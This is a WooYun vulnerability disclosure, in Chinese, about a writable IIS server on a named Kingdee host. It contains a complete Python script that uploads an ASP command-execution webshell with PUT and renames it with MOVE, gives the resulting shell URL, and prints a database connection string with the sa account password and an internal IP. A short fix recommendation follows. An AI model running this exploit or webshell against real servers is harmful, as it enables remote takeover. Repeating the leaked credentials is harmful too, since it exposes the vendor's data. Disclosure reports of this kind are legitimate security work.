当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0150360

漏洞标题:金蝶某站点IIS可写getshell

相关厂商:金蝶

漏洞作者: 路人甲

提交时间:2015-10-29 20:53

修复时间:2015-12-17 16:24

公开时间:2015-12-17 16:24

漏洞类型:系统/服务运维配置不当

危害等级:中

自评Rank:8

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-10-29: 细节已通知厂商并且等待厂商处理中
2015-11-02: 厂商已经确认,细节仅向厂商公开
2015-11-12: 细节向核心白帽子及相关领域专家公开
2015-11-22: 细节向普通白帽子公开
2015-12-02: 细节向实习白帽子公开
2015-12-17: 细节向公众公开

简要描述:

金蝶某站点IIS可写getshell

详细说明:

IIS配置不当,可写入webshell

http://eas75.kingdee.com:85/


漏洞证明:

#-*- encoding:utf-8 -*-
'''
IIS put file From http://www.lijiejie.com
Usage:
iisPUT.py www.example.com:8080
'''
import httplib
import sys
try:
conn = httplib.HTTPConnection(sys.argv[1])
conn.request(method='OPTIONS', url='/')
headers = dict(conn.getresponse().getheaders())
if headers.get('server', '').find('Microsoft-IIS') < 0:
print 'This is not an IIS web server'

if 'public' in headers and \
headers['public'].find('PUT') > 0 and \
headers['public'].find('MOVE') > 0:
conn.close()
conn = httplib.HTTPConnection(sys.argv[1])
# PUT hack.txt
conn.request( method='PUT', url='/hack.txt', body='<%execute(request("cmd"))%>' )
conn.close()
conn = httplib.HTTPConnection(sys.argv[1])
# mv hack.txt to hack.asp
conn.request(method='MOVE', url='/hack.txt', headers={'Destination': '/hack.asp'})
print 'ASP webshell:', 'http://' + sys.argv[1] + '/hack.asp'
else:
print 'Server not vulnerable'

except Exception,e:
print 'Error:', e


http://eas75.kingdee.com:85/hack.asp

kingdee_webshell.png


<connectionStrings>
<add name="appConn"
connectionString="Data Source=172.20.192.46;Initial Catalog=RMDBFD;User ID =sa;Password=kingdee$2013"
providerName="System.Data.SqlClient" />
</connectionStrings>

修复方案:

配置IIS,禁止写入, 数据库帐号尽量不要使用sa

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:8

确认时间:2015-11-02 16:22

厂商回复:

非常感谢!

最新状态:

暂无